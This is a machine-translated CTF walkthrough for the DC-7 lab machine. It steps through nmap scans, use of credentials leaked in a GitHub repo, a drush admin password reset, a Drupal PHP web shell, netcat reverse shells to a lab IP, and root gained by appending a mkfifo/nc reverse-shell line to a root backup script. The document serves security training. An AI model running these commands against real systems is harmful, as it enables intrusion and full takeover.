Dc-7 target

ifconfig

Find the host IP

Sweep a wave Intranet , Detect the surviving host

nmap 192.168.61.0/24

Use nmap Tool pair DC-5 The target machine scans the open port

nmap -A -T4 192.168.61.136 -p- -oN nmap136.A

nmap -A -T4 192.168.61.136 -p- -oN nmap136.A

Yes 22 and 80 port

Here's a hint DC7USER

use Baidu Search

You can download a file

This also shows that it is important

Download to kali Local

git clone  https://github.com/Dc7User/staffdb

cd staffdb

ls

cat config.php

Use SSH Link target , Sign in dc7user It is found that you can successfully connect

ssh [email protected]

ls

find out backups  mbox

backups Next ：website.sql.gpg  website.tar.gz.gpg

Found two files , But it's all about gpg At the end of the ,gpg The command is used to encrypt files , The encrypted files are all garbled

mbox It's a document

The source code of backup execution is found in /opt/scripts Under the table of contents

Get into /opt/scripts Under the table of contents

cd /opt/scripts

see file

cat backups.sh

Found two commands gpg drush

gpg The command is used to encrypt ,drush The order is drupal Commands used in the framework to do some configuration , It can change the user name and password

Enter into /var/www/html Under the table of contents , Because the website will have a admin user , So use drush Command to change admin The user's password is 123456, It is found that it can be modified successfully  

cd /var/www/html/
drush user-password admin --password="123456"

admin Your password has been changed to 123456 

use dirb Command to scan out the page

dirb http://192.168.61.136

stay Content—>Add content-->Basic page Next , Ready to add PHP Code bounce shell, But found that it does not support PHP

After Baidu knows ,php To be imported as a separate module  

 PHP Module download address ：

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

Check , Then click the bottom install 

And then it's all right

Go back to the page at that time , You can use PHP 了

  You can connect successfully with ant sword

  And then use kali monitor

nc -lvvp 4444

nc -e /bin/bash 192.168.61.129 4444

python -c 'import pty;pty.spawn("/bin/bash")' 

Successful connection  

find / -name backups.sh 2>/dev/null 

then

cd /opt/scripts

ls -l

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh

nc -lvvp 7777

Got it root jurisdiction

cd /root

ls

cat theflag.txt